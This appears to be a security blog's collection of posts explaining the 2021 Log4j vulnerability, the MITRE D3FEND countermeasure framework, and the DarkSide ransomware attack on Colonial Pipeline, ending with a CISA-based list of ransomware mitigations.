What is the Log4j Vulnerability?

Log4j is a widely-used library of log files for applications written in the Java programming language. It copies down everything that happens when a Java program runs. NPR spoke to Andrew Morris, founder and CEO of cyber intelligence firm GreyNoise, who described Log4j as “…a modular component that's used in many, many different kinds of software. And its job is... just basically recording things that happened and writing them to another computer somewhere else.” In December of 2021, Log4j was found to be vulnerable to remote code execution.

Put more simply, Log4j is a vulnerable logging library that allows attackers to take control of remote devices running Java software. This represents a severe security risk. Gadgets 360 reports that "the Apache Log4j Remote Code Execution Vulnerability is the single biggest, most critical vulnerability of the last decade," said Amit Yoran, chief executive of Tenable, a network security firm, and the founding director of the US Computer Emergency Readiness Team.

One of the most popular programs affected by this vulnerability is Minecraft. John Hammond, a noted cybersecurity researcher, recently posted a video showing how Log4j could be exploited in Minecraft, allowing a remote user to access the calculator of a system (proving that any other program or command could also be run). Tech Times posted an article detailing how Minecraft users can defend against this threat.

Unfortunately, Minecraft is not the only vulnerable software. Speaking to CNET, Nadir Izrael (CTO and co-founder of IoT security company Armis) said that “generally speaking, any consumer device that uses a web server could be running Apache. Apache is widely used in devices like smart TVs, DVR systems and security cameras. Think about how many of these devices are sitting in loading docks or warehouses, unconnected to the internet, and unable to receive security updates. The day they're unboxed and connected, they're immediately vulnerable to attack."

To mitigate this threat, users should continue to install all security patches and updates as soon as possible. As companies roll out patches to this vulnerability, it is important to stay on top of those updates!

MITRE D3FEND Explained

The MIRTE D3FEND Knowledge Graph lists common cybersecurity countermeasures. (Full size photo)

The MIRTE D3FEND Knowledge Graph lists common cybersecurity countermeasures. (Full size photo)

On June 22, 2021, the National Security Agency Cybersecurity division released details of a new project called D3FEND. “D3FEND, a MITRE research project funded by the NSA, improves the #cybersecurity of NSS, DoD, and the DIB by providing defensive countermeasures for common offensive techniques” (NSA Cyber, Twitter).

The MITRE Corporation is a federally funded organization that supports cybersecurity research and development. To better understand this D3FEND release, it is helpful to know about MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge), which was first developed in 2013. “The MITRE ATT&CK framework is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary's attack lifecycle and the platforms they are known to target” (McAfee, 2020). This framework allows individuals and organizations to better understand the tactics and techniques used by malicious attackers, and to better prepare for and defend against those attacks.

The 2021 release of MITRE D3FEND is a major tool that blue teams can use to protect against exploitation. This framework will allow cybersecurity professionals to fill the gaps in their coverage, comparing their current setup to the D3FEND framework. “These initial results show good promise, and we believe our research has demonstrated the feasibility of a countermeasure model built from real-world data sources” (MITRE, 2021).

For more information, check out the technical whitepaper released by MITRE here.

DarkSide Pipeline Ransomware Attack

The Colonial Pipeline delivers 45% of the fuel supply used by the eastern coast of the United States.  Hackers disrupted it in May 2021 using DarkSide RaaS (Ransomware as a Service).

The Colonial Pipeline delivers 45% of the fuel supply used by the eastern coast of the United States. Hackers disrupted it in May 2021 using DarkSide RaaS (Ransomware as a Service).

On May 11, 2021, the Cybersecurity & Infrastructure Security Agency (CISA) published an article describing the DarkSide ransomware attack on the Colonial Pipeline. This pipeline delivers 45% of the fuel supply used by the eastern coast of the United States.

When Colonial learned of the cyber attack, “they proactively disconnected certain OT (operational technology) systems to ensure the systems’ safety” (CISA report). In other words, while only the company’s IT network was hacked, the OT systems were unaffected but still taken offline deliberately by Colonial as a precaution.


What is DarkSide and how did they hack the pipeline?

Social engineering is a common way for attackers to gain access to unauthorized systems.

Social engineering is a common way for attackers to gain access to unauthorized systems.

DarkSide is a hacking group with ties to Russia. They liken themselves to Robin Hood, claiming to steal money from large companies and redistribute it to smaller organizations through charitable donations. “This Robin Hood mentality is more of a PR stunt” according to Jon DiMaggio, chief security strategist for threat intelligence firm Analyst1, interviewed in an article by TechRepublic. "When they made the donations (two donations at $10,000 each), it was reported across cyber news organizations all over the world," DiMaggio said. "It was essentially a $20K marketing cost that got their name out there. All of these guys seem to have big egos, which is why they have press releases and will talk to the media and researchers. So this donation was likely an attempt to increase their visibility."

So how was the attack carried out? “According to open-source reporting, DarkSide actors have previously been observed gaining access through phishing and exploiting remotely accessible accounts and systems and Virtual Desktop Infrastructure (VDI)” (CISA report). A phishing attack is when an attacker pretends to be someone trustworthy and convinces the victim to share login credentials or other vital system information. A VDI is defined as “the hosting of desktop environments on a central server. It is a form of desktop virtualization, as the specific desktop images run within virtual machines (VMs) and are delivered to end clients over a network” (Citrix).

While the exact details of this attack are still under investigation, it is likely that social engineering and unauthorized VDI access were involved at some level.


How to mitigate ransomware attacks

The Colonial Pipeline attack triggered panic, causing long lines and gas shortages across the east coast.

The Colonial Pipeline attack triggered panic, causing long lines and gas shortages across the east coast.

The CISA report lists many steps to take to help prevent ransomware attacks at your organization. Here is an abbreviated version of some of the steps they describe (see the full article for more details):

  • Require multi-factor authentication

  • Enable strong spam filters

  • Implement a user training program

  • Filter network traffic to prohibit malicious IP addresses

  • Update software in a timely manner.

  • Limit access to resources over networks.

  • Set antivirus/antimalware programs to conduct regular scans

  • Implement unauthorized execution prevention by:

    • Disabling macro scripts from Microsoft Office files

    • Implementing application allowlisting

    • Monitor and/or block inbound connections from Tor

    • Deploy signatures to detect and/or block inbound connection from Cobalt Strike servers

  • Implement and ensure robust network segmentation

  • Organize OT assets into logical zones

  • Identify OT and IT network inter-dependencies and develop workarounds or manual controls

  • Regularly test manual controls

  • Implement regular data backup procedures

    • Ensure that backups are regularly tested

    • Store your backups separately

    • Maintain regularly updated “gold images” of critical systems

    • Retain backup hardware

    • Store source code or executables

  • Ensure user and process account access rights are given based on the principles of least privilege and separation of duties.

For more information on how to defend against ransomware attacks, check out this webcast by John Strand, Owner and Security Analyst at Black Hills Information Security. He explains that there are many simple and free/inexpensive measures that companies can take to protect themselves. The content with John starts at the 29:15 mark and is definitely worth investigating.

Thanks for reading!